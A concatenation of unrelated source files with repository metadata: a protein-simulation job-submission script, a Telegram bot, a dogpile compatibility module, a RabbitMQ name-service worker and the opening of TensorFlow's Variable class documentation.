rg_list = [0, 0.1, 0.2, 0.4, 0.5, 1, 2, 4]
variable_test(rg_list=rg_list, repeat=1, commons=True)
if(args.mode == 15):
print("create directory_list")
with open("directory_list", "w") as f:
for i in range(40):
# print(os.getcwd())
location = os.getcwd() + "/../"
f.write(location+str(i)+"/0\n")
do("cp ../../2xov/2xov.pdb .")
do("python2 ~/opt/small_script/CalcLocalDistanceStats.py 2xov directory_list out")
if(args.mode == 14):
print("Extract qw and distance info.")
for i in range(100):
cd(str(i))
cd("0")
do("awk '{print $2}' wham.dat | sed 's/,$//' | sed 1d > qw.dat")
do("awk '{print $2}' addforce.dat | sed 's/,$//' | sed 1d > distance.dat")
cd("../..")
if args.mode == 13:
rg_list = [0, 0.1, 0.2, 0.4, 0.8, 1.6, 3.2]
memb_k_list = [0, 1, 2, 4, 8]
variable_test(rg_list=rg_list, memb_k_list=memb_k_list)
if args.mode == 12:
rg_list = [0.1, 0.2, 0.4, 0.8, 1.6, 3.2]
variable_test(rg_list=rg_list)
if args.mode == 11:
zim_type_list = ["aug04", "aug26"]
membrane_width_list = [30, 28.8]
for zim in zim_type_list:
for width in membrane_width_list:
folder = "zim_{}_width_{}".format(zim, width)
do("mkdir -p {}".format(folder))
cd(folder)
do("cp -r ../2xov .")
cd("2xov")
fixFile = "fix_backbone_coeff_single.data"
with fileinput.FileInput(fixFile, inplace=True, backup='.bak') as file:
for line in file:
print(line.replace("WIDTH", str(width)), end='')
do("cp zim_{} zim".format(zim))
cd("..")
do("run.py -n 2 2xov")
cd("..")
if args.mode == 10:
distance_list = np.linspace(166, 180, 15)
for distance in distance_list:
folder = "dis_{}".format(distance)
cd(folder)
do("sbatch run_0.slurm")
cd("..")
# if args.mode == 9:
# cmd = "python3 ~/opt/small_script/find_distance.py"
# run_slurm = base_slurm.format(cmd)
# folder_list = ['force_0.045']
# print(folder_list)
# for folder in folder_list:
# cd(folder)
# cd("simulation")
# run_list = glob.glob("*")
# for run in run_list:
# cd(run)
# cd("0")
# with open("find_distance.slurm", "w") as r:
# r.write(run_slurm)
# do("sbatch find_distance.slurm")
# cd("../..")
# cd("../..")
#
# if args.mode == 8:
# cmd = "gg.py -m 8"
# run_slurm = base_slurm.format(cmd)
#
# # folder_list = glob.glob("force_*")
# # folder_list = ['force_0.08', 'force_0.03', 'force_0.0']
# folder_list = ['force_0.055']
# # folder_list = ['force_0.07', 'force_0.02', 'force_0.045']
# # folder_list = ['force_0.06', 'force_0.04']
# print(folder_list)
# for folder in folder_list:
# cd(folder)
# cd("simulation")
# run_list = glob.glob("*")
# for run in run_list:
# cd(run)
# cd("0")
# with open("compute_angle.slurm", "w") as r:
# r.write(run_slurm)
# do("sbatch compute_angle.slurm")
# cd("../..")
# cd("../..")
# if args.mode == 7:
# for i in range(80):
# do("mv {0} ../../../new_force_ramp/memb_0_force_ramp_rg_0_new/simulation/{1}".format(i,i+90))
# if args.mode == 6:
# force_list = [0.55, 0.6, 0.65]
# # force_list = [0.25, 0.35, 0.4, 0.45]
# # force_list = [0.15, 0.2]
# for force in force_list:
# do("mkdir force_{}".format(force))
# do("cp -r 2xov force_{}/".format(force))
# cd("force_{}".format(force))
# with fileinput.FileInput("2xov/2xov_multi.in", inplace=True, backup='.bak') as file:
# for line in file:
# print(line.replace("MY_FORCE", str(force)), end='')
# do("run.py -n 10 2xov/")
# cd("..")
#
#
# if args.mode == 5:
# # cd("start_misfolded")
# distance_list = np.linspace(0, 30, 16)
# for dis in distance_list:
# do("mkdir -p dis_{}".format(dis))
# do("cp -r ../2xov/ dis_{}".format(dis))
# do("cp ../../freeEnergy/go_model_start_unfolded/simulation/dis_{0}/restart.25000000 dis_{0}/2xov/".format(dis))
# cd("dis_{}".format(dis))
# do("run.py -n 10 2xov/")
# cd("..")
# if args.mode == 4:
# do("rm data")
# for i in range(100):
# do("cat dis_{}/0/data >> data.dat".format(i))
# do("awk '{print $1}' data.dat > e.dat")
# do("awk '{print $2}' data.dat > p.dat")
# do("awk '{print $3}' data.dat > qw.dat")
#
# if args.mode == 1:
# cd("simulation")
# do("pulling_prepare.py")
# cd("..")
# do("mkdir freeEnergy")
# cd("freeEnergy")
# do("make_metadata.py -k 0.05 -t 300")
# do("pulling_analysis.py -m 3 -p 2")
#
# if args.mode == 2:
# print("80 bins.")
# # cd("simulation")
# # do("pulling_prepare.py")
# # cd("..")
# do("mkdir more_bin")
# cd("more_bin")
# do("make_metadata.py -k 0.05 -t 600")
# do("pulling_analysis.py -m 3 -p 1")
#
# if args.mode == 3:
# # cd("simulation")
# # do("pulling_prepare.py")
# # cd("..")
# do("mkdir -p only_less_than_100")
# cd("only_less_than_100")
# do("make_metadata.py -k 0.05 -t 300 -m 2")
# do("pulling_analysis.py -m 3 -p 1")
# # for i in range(52, 70):
# # do("mv {}/{} .".format(i, i-40))
# # do("mv {} {}".format(i, i-20))
# # for i in range(50):
# # do("mv force_0.8_2/{} force_0.8/{}".format(i, i+50))
# # do("mv half_contact_force_0.8_memb1_rg1_2/{} half_contact_force_0.8_memb1_rg1/{}".format(i, i+20))
#
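# The args.run block below prepares and submits SLURM jobs for target T0833:
# it creates job.1 ... job.(n-1) directories, copies the run package and the
# per-job .tpr file into each, patches the protein name inside
# myjob_nots.slurm, and then launches loopsubmit.bash in every job directory.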
if args.run:
print("Hello World")
name = "T0833"
n = 21
do("mkdir "+name)
cd(name)
for i in range(1, n):
do("mkdir -p job.{}".format(i))
do("cp ../preparation_files/myjob_nots.slurm job.{}".format(i))
do("cp ../preparation_files/loopsubmit.bash job.{}".format(i))
do("cp -r ../preparation_files/{0}_runpackage job.{1}/runpackage".format(name, i))
do("cp ../preparation_files/{1}_tpr/run.{0}.tpr job.{0}/runpackage/run.tpr".format(i, name))
for i in range(1, n):
cd("job.{}".format(i))
fileName = "myjob_nots.slurm"
with fileinput.FileInput(fileName, inplace=True, backup='.bak') as file:
for line in file:
print(line.replace("T0766", name), end='')
do("bash loopsubmit.bash")
cd("..")
# for i in range(1, 6):
# do("mkdir job.{}".format(i))
# do("cp myjob_nots.slurm job.{}".format(i))
# do("cp loopsubmit.bash job.{}".format(i))
# do("cp -r runpackage job.{}".format(i))
# do("cp run.{0}.tpr job.{0}/runpackage/run.tpr".format(i))
# for i in range(1, 6):
# cd("job.{}".format(i))
# fileName = "myjob_nots.slurm"
# name = "T0833"
# with fileinput.FileInput(fileName, inplace=True, backup='.bak') as file:
# for line in file:
# print(line.replace("T0766", name), end='')
# do("bash loopsubmit.bash")
# cd("..")
# force_list = [0.3, 0.5, 0.7, 0.9, 1.1, 1.3]
# for force in force_list:
# folder = "1d_force_" + str(force)
# do("mkdir -p " + folder)
# cd(folder)
# do("cp ../metadatafile .")
# do("~/bin/python3/bin/python3 ~/opt/pulling_analysis.py -f -m 5 --force {}".format(force))
# do("sbatch freeEnergy.slurm")
# cd("..")
# do("rm -r test")
# do("cp -r 2xov test")
# cd("test")
# do("test_run.py test.in")
if args.see:
do("head test/0/addforce.dat")
def fix_error_run():
n = args.number
for i in range(n):
os.chdir(str(i))
os.system("cp ~/opt/pulling/qnqc.slurm .")
os.system("sbatch qnqc.slurm")
os.chdir("..")
# os.system("grep 'srun: error: Application launch failed: Socket timed out on send/recv operation' . -r | cut -d':' -f1 | rev | cut -d"/" -f2- | rev > list")
# array = []
# cwd = os.getcwd()
# print(cwd)
# with open('list', 'r') as ins:
# for line in ins:
# target = line.strip('\n')
# array.append(target)
# for i in array:
# os.chdir(i)
# os.system("rm slurm-*")
# os.system("sbatch rerun.slurm")
# sleep(0.5) # Time in seconds.
# os.system("sbatch qnqc.slurm")
# sleep(0.5) # Time in seconds.
# # os.system("pwd")
# os.chdir(cwd)
# os.system("cut -d'/' -f2 list >")
# if(args.fix):
# fix_error_run()
def rerun():
n = args.number
for i in range(n):
os.system("cp -r {0} rerun_{0}".format(str(i)))
# source = "~/opt/gagb/gagb_constant200_rerun.in"
# target = " 2lhc.in"
source = "~/opt/pulling/2xov_force_load_dis.in"
target = " 2xov.in"
os.system("cp "+source + target)
os.system("cp "+target+" rerun_{}/".format(str(i)))
os.chdir("rerun_"+str(i))
os.system("rm slurm*")
os.system("sbatch run.slurm")
os.chdir("..")
# if(args.rerun):
# rerun()
def continue_run():
n = 10
os.chdir("simulation")
for i in range(n):
os.system("cp -r {0} continue_{0}".format(str(i)))
# source = "~/opt/gagb/gagb_constant200_rerun.in"
# target = " 2lhc.in"
source = "~/opt/pulling/2xov_continue_run.in"
target = " 2xov.in"
os.system("cp "+source + target)
os.system("cp "+target+" continue_{}/".format(str(i)))
os.chdir("continue_"+str(i))
os.system("rm slurm*")
os.system( # replace RANDOM with a random number
"sed -i.bak 's/RANDOM/'" +
str(randint(1, 10**6)) +
"'/g' 2xov.in")
os.system("sbatch run.slurm")
os.chdir("..")
# if(args.go):
# continue_run()
# parser = argparse.ArgumentParser(
# description="This is my playground for current project")
# parser.add_argument("protein", help="the name of protein")
# # parser.add_argument("template", help="the name of template file")
# args = parser.parse_args()
# # protein_name = args.template.split('_', 1)[-1].strip('/')
# protein_name = args.protein.strip('/')
# name = "ga_2m"
## -------------Pulling--------
# os.system("cp ~/opt/small_script/springForce.plt .")
# os.system("cp ~/opt/small_script/springForce_smooth.plt .")
# os.system("gnuplot springForce.plt")
# os.system("gnuplot springForce_smooth.plt")
# os.system("open springForce.pdf")
# os.system("open springForce_smooth.pdf")
# SpringConstant_list = [3e-05, 5e-05, 1e-06, 3e-06, 5e-06, 1e-05, 1e-07]
# # SpringConstant_list = [3e-06, 5e-06]
# for SpringConstant in SpringConstant_list:
# name = "spring"+str(SpringConstant)
# os.system("mkdir "+name)
# os.chdir(name)
# os.system("cp -r ../2xov/ .")
# os.system("cp ../variables.dat .")
# os.chdir("2xov")
# os.system( # replace SIMULATION_STEPS with specific steps
# "sed -i.bak 's/SpringForce/'" +
# str(SpringConstant) +
# "'/g' "+protein_name+".in")
# os.chdir("..")
# os.system("run.py 2xov/ -s 8 -n 2")
# os.chdir("..")
# number_of_run_list = [2, 4, 8, 16]
# for n in number_of_run_list:
# name = "ga_"+str(n)+"m"
# # os.system("mkdir "+name)
# os.system("cp -r 2lhd.pdb "+name)
#
# # os.system("cp -r 2lhc variables.dat "+name)
# os.chdir(name)
# for i in range(20):
# os.chdir("analysis/"+str(i))
# os.system("cp ../../2lhd.pdb .")
# os.system("python2 ~/opt/script/CalcQValue.py 2lhd.pdb dump.lammpstrj q_gb.dat")
# os.system("python2 ~/opt/script/CalcQValue.py 2lhc.pdb dump.lammpstrj q_ga.dat")
# os.system("cp ~/opt/small_script/qw_gagb.plt .")
# os.system("gnuplot qw_gagb.plt")
# os.system("mv qw_gagb.pdf ../../results/qw_gagb_{0}.pdf".format(str(i)))
# os.chdir("../..")
# os.chdir("..")
#
# for n in number_of_run_list:
# name = "ga_"+str(n)+"m"
# # os.system("mkdir "+name)
# os.system("cp -r 2lhd.pdb "+name)
#
# # os.system("cp -r 2lhc variables.dat "+name)
# os.chdir(name)
# for i in range(20):
# os.chdir("analysis/"+str(i))
# os.system("paste q_ga.dat q_gb.dat > q_gagb.dat")
# os.system("cp ~/opt/small_script/qw_ga-gb.plt .")
# os.system("gnuplot qw_ga-gb.plt")
# os.system("mv qw_ga-gb.pdf ../../results/qw_ga-gb_{0}.pdf".format(str(i)))
# os.chdir("../..")
# os.system("cp ~/opt/small_script/qw_ga_all.plt .")
# os.system("gnuplot qw_ga_all.plt")
# os.system("cp ~/opt/small_script/qw_gb_all.plt .")
# os.system("gnuplot qw_gb_all.plt")
# os.system("cp ~/opt/small_script/qw_diff_all.plt .")
# os.system("gnuplot qw_diff_all.plt")
# os.chdir("..")
# simulation_steps = 4 * 10**6
# warm_up_steps = 10 * 10**5
#
# seed(datetime.now())
# n= 20
# vmd = "/Applications/VMD\ 1.9.2.app/Contents/MacOS/startup.command"
#
# os.system("BuildAllAtomsFromLammps.py dump.lammpstrj movie")
# os.system("cp ~/opt/plot_scripts/2xov_movie.tcl .")
# os.system(vmd+" -e 2xov_movie.tcl ")
# os.system("mkdir -p MyResults")
# for i in range(n):
# print(i)
# os.chdir("analysis/"+str(i))
# os.system("cp ~/opt/plot_scripts/2xov_movie_screenshot.tcl .")
# os.system(vmd+" -e 2xov_movie_screenshot.tcl")
# os.system("cp frame1000.tga ../../MyResults/frame"+str(i)+"_1000.tga")
# #os.system("cp frame450.tga ../Results/frame"+folder_name+"_450.tga")
# # os.system("movie.py "+protein_name)
# os.chdir("../..")
# # analysis
# folder_name = ""
# result_folder = "WeiLu_Aug_07"
# protein_list = ['T089', 'T120', 'T251', 'TOP7', '1UBQ']
# sublist = ['']
# # sublist = ['_ha', '_he']
# # sublist = ['_lp', '_he_lp']
# # folder_list = []
# for protein in protein_list:
# for sub in sublist:
# folder_name = protein+sub
# os.chdir(folder_name)
# os.chdir("best_2nd")
# os.system("pymol ~/opt/plot_scripts/align.pml > matrix.dat")
# os.system("head -n 70 matrix.dat | tail -n 20 > cealign_matrix.dat")
# # for i in range(19, -1, -1):
# # os.system("mv {}.pdb {}.pdb".format(i, i+1))
# os.chdir("../..")
# os.chdir(protein)
# os.chdir("best_1st")
# os.system("python3 ~/opt/small_script/cross_q.py")
# os.chdir("..")
# os.chdir("best_2nd")
# os.system("python3 ~/opt/small_script/cross_q.py")
# os.chdir("..")
# os.chdir("..")
# n = 3
# for i in range(n):
# # simulation set up
# folder_name = str(i)
# os.system("mkdir -p "+folder_name)
# os.system("cp -r "+args.protein+"* "+folder_name)
# os.chdir(folder_name)
# os.system("cp ../../helix_less/simulation/"+str(i)+"/restart.4000000 .")
# os.system( # replace SIMULATION_STEPS with specific steps
# "sed -i.bak 's/WARM_UP_STEPS/'" +
# str(warm_up_steps) +
# "'/g' "+protein_name+".in")
# os.system( # replace RANDOM with a radnom number
# "sed -i.bak 's/RANDOM/'" +
# str(randint(1, 10**6)) +
# "'/g' "+protein_name+".in")
# os.system( # replace SIMULATION_STEPS with specific steps
# "sed -i.bak 's/SIMULATION_STEPS/'" +
# str(simulation_steps) +
# "'/g' "+protein_name+".in")
# # if(platform.system() == 'Darwin'):
# # os.system("/Users/weilu/Documents/lammps-9Oct12_modified/src/lmp_serial \
# # < "+protein_name+".in")
# if(platform.system() == 'Darwin'):
# os.system("/Users/weilu/Documents/lammps-9Oct12_modified/src/lmp_serial \
# < "+protein_name+".in")
# elif(platform.system() == 'Linux'):
# os.system("cp ~/opt/run.slurm .")
# os.system( # replace PROTEIN with pdb name
# "sed -i.bak 's/PROTEIN/'" +
# protein_name +
# "'/g' run.slurm")
# os.system("sbatch run.slurm")
# else:
# print("system unkown")
# os.chdir("..")
# exit(1)
# w_helix_list = [0.1, 0.5, 1, 1.5]
# m_helix_list = [0.1, 0.5, 1, 1.5]
#
# for i in range(len(w_helix_list)):
# w = w_helix_list[i]
# for j in range(len(m_helix_list)):
#
# # m = m_helix_list[j]
# folder_name = str(i)+"_"+str(j)
# # os.system("cd "folder_name)
# os.chdir(folder_name)
# # os.system("analysis.py 2xov/")
# # os.system("echo "+folder_name+" >> ../all")
# os.system("sort -k 3 analysis/list_of_max_q > ../data/"+folder_name)
# os.chdir("..")
# # os.system("mkdir "+folder_name)
# # os.chdir(folder_name)
# # os.system("cp -r ../2xov .")
# # os.chdir("2xov")
# # os.system(
# # "sed -i.bak 's/W_HELIX/'" +
# # str(w) +
# # "'/g' fix_backbone_coeff.data")
# # os.system(
# # "sed -i.bak 's/M_HELIX/'" +
# # str(m) +
# # "'/g' fix_backbone_coeff.data")
# # os.chdir("..")
# # os.system("run.py 2xov/ -n 5")
# os.system("cp ~/opt/gg.py this_gg.py")
# for i in range(5):
# os.system("mkdir "+str(i))
# os.chdir(str(i))
# os.system("cp -r ../2xov/ .")
# os.system("cp ../../2xov_strong_single_memory_600to500/simulation/"+str(i)+"/restart.2000000 2xov/")
# os.system("run.py -s 4 -n 2 2xov/")
# os.chdir("..")
# # rama_list = [6, 8, 16]
# # rama_list = [4]
# melt_t_list = [400, 500, 600]
# for variable in melt_t_list:
# folder_name = str(variable)
# os.system("mkdir "+folder_name)
# os.chdir(folder_name)
# os.system("cp -r ../1qjp .")
# os.chdir("1qjp")
# os.system(
# "sed -i.bak 's/MELTT/'" +
# str(variable) +
# "'/g' 1qjp.in")
# os.chdir("..")
# # os.system("pwd")
# os.system("run.py 1qjp/ -n 5 -s 5")
# os.chdir("..")
# os.system("cp ~/opt/gg.py this_gg.py")
#
# exec (open("config.py").read())
# n = number_of_run
# steps = simulation_steps
#
# protein_name = args.protein.strip('/')
#
# temp = 400
# folder_name = "{}_t{}_q100_test11".format(protein_name, str(temp))
# print("all going to "+folder_name)
# os.system("mkdir -p "+folder_name)
# os.system("rm -f "+folder_name + "/*")
# command = 'cat simulation/{}/%d/wham11 \
# >> {}/all_wham.dat'.format(temp, folder_name)
# # cal rmsd
# os.chdir("simulation/"+str(temp))
# for i in range(n):
# os.chdir(str(i))
# os.system("awk '{print>\"file1\"(NR>(n/2)?2:1)}' n=\"$(wc -l <file1)\" file1")
# os.system("cat file11 >> ../../../"+folder_name+"/rmsd_total")
# # os.system("sed 1d wham.dat > wham1d.dat")
# os.system("awk '{print>\"wham1\"(NR>(n/2)?2:1)}' n=\"$(wc -l <wham1)\" wham1")
# os.chdir("..")
# os.chdir("../..")
# for i in range(n):
# cmd = command % i
# os.system(cmd)
# os.chdir(folder_name)
# os.system("awk '{print $2}' all_wham.dat > Qw_total")
# os.system("awk '{print $3}' all_wham.dat > rg_total")
# os.system("awk '{print $4}' all_wham.dat > p_total")
# os.system("awk '{print $5}' all_wham.dat > tc_total")
# os.system("awk '{print $NF}' all_wham.dat > e_total")
# os.system("cp ~/opt/wham_analysis/*.m .")
# os.chdir("..")
# os.system("~/opt/script/wham/fused_calc_cv.sc {} top7 50 400 350 450 5 50 100 0 0.98".format(folder_name))
#
#
# folder_name = "{}_t{}_q100_test12".format(protein_name, str(temp))
# print("all going to "+folder_name)
# os.system("mkdir -p "+folder_name)
# os.system("rm -f "+folder_name + "/*")
# command = 'cat simulation/{}/%d/wham12 \
# >> {}/all_wham.dat'.format(temp, folder_name)
# # cal rmsd
# os.chdir("simulation/"+str(temp))
# for i in range(n):
# os.chdir(str(i))
# os.system("cat file12 >> ../../../"+folder_name+"/rmsd_total")
# os.chdir("..")
# os.chdir("../..")
# for i in range(n):
# cmd = command % i
# os.system(cmd)
# os.chdir(folder_name)
# os.system("awk '{print $2}' all_wham.dat > Qw_total")
# os.system("awk '{print $3}' all_wham.dat > rg_total")
# os.system("awk '{print $4}' all_wham.dat > p_total")
# os.system("awk '{print $5}' all_wham.dat > tc_total")
# os.system("awk '{print $NF}' all_wham.dat > e_total")
# os.system("cp ~/opt/wham_analysis/*.m .")
# os.chdir("..")
#
#
#
# os.system("~/opt/script/wham/fused_calc_cv.sc {} top7 50 400 350 450 5 50 100 0 0.98".format(folder_name))
#
# result_folder = "WeiLu_Aug_07"
# os.system("mkdir -p "+result_folder)
# protein_list = ['T089', 'T120', 'T251', 'top7', '1UBQ']
# # sublist = ['_ha', '_he']
# sublist = ['_lp', '_he_lp']
# folder_list = []
# for protein in protein_list:
# for sub in sublist:
# folder_list += [protein+sub]
# print(folder_list)
# # exit(1)
# # awk '{print>'file'(NR>(n/2)?2:1)}' n='$(wc -l <test)' test
# for folder in folder_list:
# print(folder)
# os.chdir(folder)
# exec (open("config.py").read())
# n = number_of_run
# steps = simulation_steps
# os.system("mkdir -p ../{}/".format(result_folder)+folder+"/best_q")
# os.system("sort analysis/list_of_max_q > ../{}/q_".format(result_folder)+folder+".dat")
# for i in range(n):
# # move
# os.chdir("analysis/"+str(i))
# os.system("cp chosen.pdb ../../../{}/".format(result_folder) + folder+"/best_q/"+str(i)+".pdb")
# os.chdir("../..")
# os.chdir("..")
# result_folder = "WeiLu_Aug_07"
# os.system("mkdir -p "+result_folder)
# protein_list = ['T089', 'T120', 'T251', 'top7', '1UBQ']
# # sublist = ['_ha', '_he']
# sublist = ['_lp', '_he_lp']
# folder_list = []
# for protein in protein_list:
# for sub in sublist:
# folder_list += [protein+sub]
# print(folder_list)
# # exit(1)
#
# for folder in folder_list:
# print(folder)
# os.chdir(folder)
# exec (open("config.py").read())
# n = number_of_run
# steps = simulation_steps
# os.system("mkdir -p ../{}/".format(result_folder)+folder+"/best_q")
# os.system("sort analysis/list_of_max_q > ../{}/q_".format(result_folder)+folder+".dat")
# for i in range(n):
# # move
# os.chdir("analysis/"+str(i))
# os.system("cp chosen.pdb ../../../{}/".format(result_folder) + folder+"/best_q/"+str(i)+".pdb")
# os.chdir("../..")
# os.chdir("..")
|
luwei0917/awsemmd_script
|
davinci_gg.py
|
Python
|
mit
| 132,835
|
__author__ = 'antonioirizar'
from twx.botapi import TelegramBot, ReplyKeyboardMarkup, Error
from botonio.user import User
class Botonio:
"""Principal class to run the Bot"""
def __init__(self, token):
self.users = {}
self.bot = TelegramBot(token)
self.bot.update_bot_info().wait()
self.offset = 1
updates = self.bot.get_updates().wait()
if isinstance(updates, Error):
print(updates)
raise Exception('Error connecting to Telegram.')
if len(updates):
self.offset = updates[-1].update_id
def start(self):
while True:
updates = self.bot.get_updates(offset=self.offset).wait()
if not len(updates):
continue
self.offset = updates[-1].update_id
self.offset += 1
for update in updates:
if update.message is None:
continue
sender = update.message.sender
if sender.id not in self.users:
user = User(sender.first_name, sender.id)
self.users[user.user_id] = user
else:
user = self.users[sender.id]
if update.message.text == 'stop':
del self.users[user.user_id]
continue
messages = user.process_message(update.message.text)
if isinstance(messages, tuple):
self.bot.send_message(user.user_id, messages[0], reply_markup=self._numeric_keyboard()).wait()
else:
self.bot.send_message(user.user_id, messages).wait()
@staticmethod
def _numeric_keyboard():
keyboard = [
['1', '2'],
['3', '4']
]
return ReplyKeyboardMarkup.create(keyboard)
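# Minimal usage sketch (an assumption, not part of the original module);
# "YOUR_BOT_TOKEN" is a placeholder for a real Telegram bot token:
#
# if __name__ == '__main__':
#     bot = Botonio('YOUR_BOT_TOKEN')
#     bot.start()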
|
antonioIrizar/telegram-bot-AWS
|
botonio/core.py
|
Python
|
gpl-3.0
| 1,848
|
import collections
import inspect
import sys
py2k = sys.version_info < (3, 0)
py3k = sys.version_info >= (3, 0)
py32 = sys.version_info >= (3, 2)
py27 = sys.version_info >= (2, 7)
jython = sys.platform.startswith("java")
win32 = sys.platform.startswith("win")
try:
import threading
except ImportError:
import dummy_threading as threading # noqa
FullArgSpec = collections.namedtuple(
"FullArgSpec",
[
"args",
"varargs",
"varkw",
"defaults",
"kwonlyargs",
"kwonlydefaults",
"annotations",
],
)
ArgSpec = collections.namedtuple(
"ArgSpec", ["args", "varargs", "keywords", "defaults"]
)
def inspect_getfullargspec(func):
"""Fully vendored version of getfullargspec from Python 3.3."""
if inspect.ismethod(func):
func = func.__func__
if not inspect.isfunction(func):
raise TypeError("{!r} is not a Python function".format(func))
co = func.__code__
if not inspect.iscode(co):
raise TypeError("{!r} is not a code object".format(co))
nargs = co.co_argcount
names = co.co_varnames
nkwargs = co.co_kwonlyargcount if py3k else 0
args = list(names[:nargs])
kwonlyargs = list(names[nargs : nargs + nkwargs])
nargs += nkwargs
varargs = None
if co.co_flags & inspect.CO_VARARGS:
varargs = co.co_varnames[nargs]
nargs = nargs + 1
varkw = None
if co.co_flags & inspect.CO_VARKEYWORDS:
varkw = co.co_varnames[nargs]
return FullArgSpec(
args,
varargs,
varkw,
func.__defaults__,
kwonlyargs,
func.__kwdefaults__ if py3k else None,
func.__annotations__ if py3k else {},
)
def inspect_getargspec(func):
return ArgSpec(*inspect_getfullargspec(func)[0:4])
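# Illustrative example (assuming Python 3 semantics):
# def f(a, b=1, *args, **kw): pass
# inspect_getfullargspec(f) -> FullArgSpec(args=['a', 'b'], varargs='args',
#     varkw='kw', defaults=(1,), kwonlyargs=[], kwonlydefaults=None,
#     annotations={})
# inspect_getargspec(f) keeps only the first four fields as an ArgSpec.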
if py3k: # pragma: no cover
string_types = (str,)
text_type = str
string_type = str
if py32:
callable = callable # noqa
else:
def callable(fn): # noqa
return hasattr(fn, "__call__")
def u(s):
return s
def ue(s):
return s
import configparser
import io
import _thread as thread
else:
# Using noqa below because tox -e pep8 uses
# python3.7 as the default interpreter
string_types = (basestring,) # noqa
text_type = unicode # noqa
string_type = str
def u(s):
return unicode(s, "utf-8") # noqa
def ue(s):
return unicode(s, "unicode_escape") # noqa
import ConfigParser as configparser # noqa
import StringIO as io # noqa
callable = callable # noqa
import thread # noqa
if py3k or jython:
import pickle
else:
import cPickle as pickle # noqa
if py3k:
def read_config_file(config, fileobj):
return config.read_file(fileobj)
else:
def read_config_file(config, fileobj):
return config.readfp(fileobj)
def timedelta_total_seconds(td):
if py27:
return td.total_seconds()
else:
return (
td.microseconds + (td.seconds + td.days * 24 * 3600) * 1e6
) / 1e6
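# Example: timedelta_total_seconds(timedelta(minutes=1, microseconds=500000))
# evaluates to 60.5 on both branches (td.total_seconds() on 2.7+, and the
# manual microsecond/second/day arithmetic otherwise).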
|
pymedusa/SickRage
|
ext/dogpile/util/compat.py
|
Python
|
gpl-3.0
| 3,097
|
import os, pika, json, time, random
some_names = ["Andrew", "Josh", "Peter", "Owen", "Shalita", "Helen", "Natalie", "Simon", "Jamie"]
class Namer(object):
def __init__(self, routes):
self.connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
self.channel = self.connection.channel()
self.exchange = "warren"
self.channel.exchange_declare(exchange=self.exchange, type="topic")
result = self.channel.queue_declare(exclusive=True)
self.queue_name = result.method.queue
for route in routes:
self.channel.queue_bind(exchange=self.exchange,
queue=self.queue_name,
routing_key=route)
def publish(self, route, data):
self.channel.basic_publish(self.exchange, routing_key=route,
body=json.dumps(data),
properties = pika.BasicProperties(content_type="application/json"))
def process(self, ch, method, properties, body):
obj = json.loads(body)
self.publish(method.routing_key + ".rsp", {"first":random.choice(some_names)})
print " [x] %r:%r" % (method.routing_key, body)
def start(self):
self.channel.basic_consume(self.process,queue=self.queue_name,no_ack=True)
self.channel.start_consuming()
def close(self):
self.connection.close()
if __name__ == "__main__":
logger = Namer(["Name.get"])
try:
logger.start()
finally:
logger.close()
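# Client-side sketch (an assumption based on the routing used above): a caller
# publishes a JSON body to the "warren" topic exchange with routing key
# "Name.get" and listens on "Name.get.rsp" to receive {"first": <random name>}:
#
# channel.basic_publish("warren", routing_key="Name.get", body=json.dumps({}),
#     properties=pika.BasicProperties(content_type="application/json"))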
|
bobbynewmark/microframeworkexample
|
name_service.py
|
Python
|
bsd-2-clause
| 1,572
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Variable class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.framework import variable_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
class Variable(object):
"""See the [Variables How To](../../how_tos/variables/index.md) for a high
level overview.
A variable maintains state in the graph across calls to `run()`. You add a
variable to the graph by constructing an instance of the class `Variable`.
The `Variable()` constructor requires an initial value for the variable,
which can be a `Tensor` of any type and shape. The initial value defines the
type and shape of the variable. After construction, the type and shape of
the variable are fixed. The value can be changed using one of the assign
methods.
If you want to change the shape of a variable later you have to use an
`assign` Op with `validate_shape=False`.
Just like any `Tensor`, variables created with `Variable()` can be used as
inputs for other Ops in the graph. Additionally, all the operators
overloaded for the `Tensor` class are carried over to variables, so you can
also add nodes to the graph by just doing arithmetic on variables.
```python
import tensorflow as tf
# Create a variable.
w = tf.Variable(<initial-value>, name=<optional-name>)
# Use the variable in the graph like any Tensor.
y = tf.matmul(w, ...another variable or tensor...)
# The overloaded operators are available too.
z = tf.sigmoid(w + y)
# Assign a new value to the variable with `assign()` or a related method.
w.assign(w + 1.0)
w.assign_add(1.0)
```
When you launch the graph, variables have to be explicitly initialized before
you can run Ops that use their value. You can initialize a variable by
running its *initializer op*, restoring the variable from a save file, or
simply running an `assign` Op that assigns a value to the variable. In fact,
the variable *initializer op* is just an `assign` Op that assigns the
variable's initial value to the variable itself.
```python
# Launch the graph in a session.
with tf.Session() as sess:
# Run the variable initializer.
sess.run(w.initializer)
# ...you now can run ops that use the value of 'w'...
```
The most common initialization pattern is to use the convenience function
`initialize_all_variables()` to add an Op to the graph that initializes
all the variables. You then run that Op after launching the graph.
```python
# Add an Op to initialize all variables.
init_op = tf.initialize_all_variables()
# Launch the graph in a session.
with tf.Session() as sess:
# Run the Op that initializes all variables.
sess.run(init_op)
# ...you can now run any Op that uses variable values...
```
If you need to create a variable with an initial value dependent on another
variable, use the other variable's `initialized_value()`. This ensures that
variables are initialized in the right order.
All variables are automatically collected in the graph where they are
created. By default, the constructor adds the new variable to the graph
collection `GraphKeys.VARIABLES`. The convenience function
`all_variables()` returns the contents of that collection.
When building a machine learning model it is often convenient to distinguish
between variables holding the trainable model parameters and other variables
such as a `global step` variable used to count training steps. To make this
easier, the variable constructor supports a `trainable=<bool>` parameter. If
`True`, the new variable is also added to the graph collection
`GraphKeys.TRAINABLE_VARIABLES`. The convenience function
`trainable_variables()` returns the contents of this collection. The
various `Optimizer` classes use this collection as the default list of
variables to optimize.
Creating a variable.
@@__init__
@@initialized_value
Changing a variable value.
@@assign
@@assign_add
@@assign_sub
